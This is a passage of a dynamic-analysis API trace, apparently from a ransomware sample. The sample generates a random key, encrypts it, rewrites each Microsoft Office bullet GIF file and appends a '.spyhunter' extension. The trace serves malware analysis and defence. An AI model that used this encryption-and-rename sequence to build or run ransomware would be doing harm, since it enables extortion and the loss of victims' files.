returned 0x2c0000 [0101.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0101.956] GetProcessHeap () returned 0x2c0000 [0101.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b880 | out: hHeap=0x2c0000) returned 1 [0101.957] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8f0 | out: pbBuffer=0x270f8f0) returned 1 [0101.957] GetProcessHeap () returned 0x2c0000 [0101.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0101.957] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8e8*=0x30) returned 1 [0101.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21434_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0101.957] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF") returned 73 [0101.958] StrStrW (lpFirst="BD21434_.GIF", lpSrch=".txt") returned 0x0 [0101.958] GetProcessHeap () returned 0x2c0000 [0101.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0101.958] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f8ac*=0xb1, lpOverlapped=0x0) returned 1 [0101.965] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.965] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x270f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f8ac*=0xb1, lpOverlapped=0x0) returned 1 [0101.965] GetProcessHeap () returned 0x2c0000 [0101.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0101.966] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.966] WriteFile (in: hFile=0x170, lpBuffer=0x270f8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8ac, lpOverlapped=0x0 | out: lpBuffer=0x270f8ec*, lpNumberOfBytesWritten=0x270f8ac*=0x4, lpOverlapped=0x0) returned 1 [0101.966] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8ac*=0x30, lpOverlapped=0x0) returned 1 [0101.966] CloseHandle (hObject=0x170) returned 1 [0101.966] GetProcessHeap () returned 0x2c0000 [0101.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0101.966] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF.spyhunter") returned 83 [0101.966] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21434_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21434_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21434_.gif.spyhunter")) returned 1 [0101.967] GetProcessHeap () returned 0x2c0000 [0101.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0101.967] GetProcessHeap () returned 0x2c0000 [0101.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0101.967] GetProcessHeap () returned 0x2c0000 [0101.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b7a0 | out: hHeap=0x2c0000) returned 1 [0101.968] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8f0 | out: pbBuffer=0x270f8f0) returned 1 [0101.968] GetProcessHeap () returned 0x2c0000 [0101.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0101.968] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8e8*=0x30) returned 1 [0101.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21433_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0101.968] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF") returned 73 [0101.968] StrStrW (lpFirst="BD21433_.GIF", lpSrch=".txt") returned 0x0 [0101.968] GetProcessHeap () returned 0x2c0000 [0101.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0101.968] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f8ac*=0xb9, lpOverlapped=0x0) returned 1 [0101.969] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.969] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x270f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f8ac*=0xb9, lpOverlapped=0x0) returned 1 [0101.970] GetProcessHeap () returned 0x2c0000 [0101.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0101.970] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.970] WriteFile (in: hFile=0x170, lpBuffer=0x270f8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8ac, lpOverlapped=0x0 | out: lpBuffer=0x270f8ec*, lpNumberOfBytesWritten=0x270f8ac*=0x4, lpOverlapped=0x0) returned 1 [0101.970] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8ac*=0x30, lpOverlapped=0x0) returned 1 [0101.970] CloseHandle (hObject=0x170) returned 1 [0101.970] GetProcessHeap () returned 0x2c0000 [0101.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0101.970] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF.spyhunter") returned 83 [0101.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21433_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21433_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21433_.gif.spyhunter")) returned 1 [0101.971] GetProcessHeap () returned 0x2c0000 [0101.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0101.971] GetProcessHeap () returned 0x2c0000 [0101.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0101.971] GetProcessHeap () returned 0x2c0000 [0101.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b6c0 | out: hHeap=0x2c0000) returned 1 [0101.971] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8e8 | out: pbBuffer=0x270f8e8) returned 1 [0101.971] GetProcessHeap () returned 0x2c0000 [0101.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0101.971] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8e0*=0x30) returned 1 [0101.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21423_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0101.972] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF") returned 73 [0101.972] StrStrW (lpFirst="BD21423_.GIF", lpSrch=".txt") returned 0x0 [0101.972] GetProcessHeap () returned 0x2c0000 [0101.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0101.972] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f8a4*=0xe9, lpOverlapped=0x0) returned 1 [0101.974] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.974] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x270f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f8a4*=0xe9, lpOverlapped=0x0) returned 1 [0101.974] GetProcessHeap () returned 0x2c0000 [0101.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0101.974] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.974] WriteFile (in: hFile=0x170, lpBuffer=0x270f8e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8a4, lpOverlapped=0x0 | out: lpBuffer=0x270f8e4*, lpNumberOfBytesWritten=0x270f8a4*=0x4, lpOverlapped=0x0) returned 1 [0101.974] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8a4*=0x30, lpOverlapped=0x0) returned 1 [0101.974] CloseHandle (hObject=0x170) returned 1 [0101.975] GetProcessHeap () returned 0x2c0000 [0101.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0101.975] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF.spyhunter") returned 83 [0101.975] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21423_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21423_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21423_.gif.spyhunter")) returned 1 [0101.975] GetProcessHeap () returned 0x2c0000 [0101.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0101.975] GetProcessHeap () returned 0x2c0000 [0101.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0101.976] GetProcessHeap () returned 0x2c0000 [0102.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b5e0 | out: hHeap=0x2c0000) returned 1 [0102.024] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8e8 | out: pbBuffer=0x270f8e8) returned 1 [0102.025] GetProcessHeap () returned 0x2c0000 [0102.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.025] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8e0*=0x30) returned 1 [0102.025] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21422_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.025] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF") returned 73 [0102.025] StrStrW (lpFirst="BD21422_.GIF", lpSrch=".txt") returned 0x0 [0102.026] GetProcessHeap () returned 0x2c0000 [0102.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.226] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f8a4*=0x101, lpOverlapped=0x0) returned 1 [0102.284] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffeff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.284] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x270f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f8a4*=0x101, lpOverlapped=0x0) returned 1 [0102.296] GetProcessHeap () returned 0x2c0000 [0102.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.296] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.296] WriteFile (in: hFile=0x170, lpBuffer=0x270f8e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8a4, lpOverlapped=0x0 | out: lpBuffer=0x270f8e4*, lpNumberOfBytesWritten=0x270f8a4*=0x4, lpOverlapped=0x0) returned 1 [0102.329] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8a4*=0x30, lpOverlapped=0x0) returned 1 [0102.329] CloseHandle (hObject=0x170) returned 1 [0102.329] GetProcessHeap () returned 0x2c0000 [0102.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.329] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF.spyhunter") returned 83 [0102.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21422_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21422_.gif.spyhunter")) returned 1 [0102.330] GetProcessHeap () returned 0x2c0000 [0102.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.330] GetProcessHeap () returned 0x2c0000 [0102.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.330] GetProcessHeap () returned 0x2c0000 [0102.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b500 | out: hHeap=0x2c0000) returned 1 [0102.330] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8e0 | out: pbBuffer=0x270f8e0) returned 1 [0102.330] GetProcessHeap () returned 0x2c0000 [0102.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.330] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8d8*=0x30) returned 1 [0102.330] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21399_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.393] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF") returned 73 [0102.393] StrStrW (lpFirst="BD21399_.GIF", lpSrch=".txt") returned 0x0 [0102.393] GetProcessHeap () returned 0x2c0000 [0102.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.394] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f89c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f89c*=0x102, lpOverlapped=0x0) returned 1 [0102.395] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.395] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x270f89c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f89c*=0x102, lpOverlapped=0x0) returned 1 [0102.395] GetProcessHeap () returned 0x2c0000 [0102.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.395] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.395] WriteFile (in: hFile=0x170, lpBuffer=0x270f8dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f89c, lpOverlapped=0x0 | out: lpBuffer=0x270f8dc*, lpNumberOfBytesWritten=0x270f89c*=0x4, lpOverlapped=0x0) returned 1 [0102.395] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f89c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f89c*=0x30, lpOverlapped=0x0) returned 1 [0102.395] CloseHandle (hObject=0x170) returned 1 [0102.395] GetProcessHeap () returned 0x2c0000 [0102.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.424] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF.spyhunter") returned 83 [0102.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21399_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21399_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21399_.gif.spyhunter")) returned 1 [0102.430] GetProcessHeap () returned 0x2c0000 [0102.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.430] GetProcessHeap () returned 0x2c0000 [0102.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.430] GetProcessHeap () returned 0x2c0000 [0102.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b340 | out: hHeap=0x2c0000) returned 1 [0102.430] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8e0 | out: pbBuffer=0x270f8e0) returned 1 [0102.430] GetProcessHeap () returned 0x2c0000 [0102.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.430] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8d8*=0x30) returned 1 [0102.430] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21398_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.431] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF") returned 73 [0102.431] StrStrW (lpFirst="BD21398_.GIF", lpSrch=".txt") returned 0x0 [0102.431] GetProcessHeap () returned 0x2c0000 [0102.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.431] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f89c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f89c*=0x146, lpOverlapped=0x0) returned 1 [0102.432] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.432] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x270f89c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f89c*=0x146, lpOverlapped=0x0) returned 1 [0102.432] GetProcessHeap () returned 0x2c0000 [0102.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.432] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.432] WriteFile (in: hFile=0x170, lpBuffer=0x270f8dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f89c, lpOverlapped=0x0 | out: lpBuffer=0x270f8dc*, lpNumberOfBytesWritten=0x270f89c*=0x4, lpOverlapped=0x0) returned 1 [0102.432] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f89c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f89c*=0x30, lpOverlapped=0x0) returned 1 [0102.432] CloseHandle (hObject=0x170) returned 1 [0102.432] GetProcessHeap () returned 0x2c0000 [0102.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.432] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF.spyhunter") returned 83 [0102.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21398_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21398_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21398_.gif.spyhunter")) returned 1 [0102.433] GetProcessHeap () returned 0x2c0000 [0102.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.433] GetProcessHeap () returned 0x2c0000 [0102.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.433] GetProcessHeap () returned 0x2c0000 [0102.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b260 | out: hHeap=0x2c0000) returned 1 [0102.433] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8d8 | out: pbBuffer=0x270f8d8) returned 1 [0102.433] GetProcessHeap () returned 0x2c0000 [0102.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.433] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8d0*=0x30) returned 1 [0102.433] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21377_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.433] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21377_.GIF") returned 73 [0102.434] StrStrW (lpFirst="BD21377_.GIF", lpSrch=".txt") returned 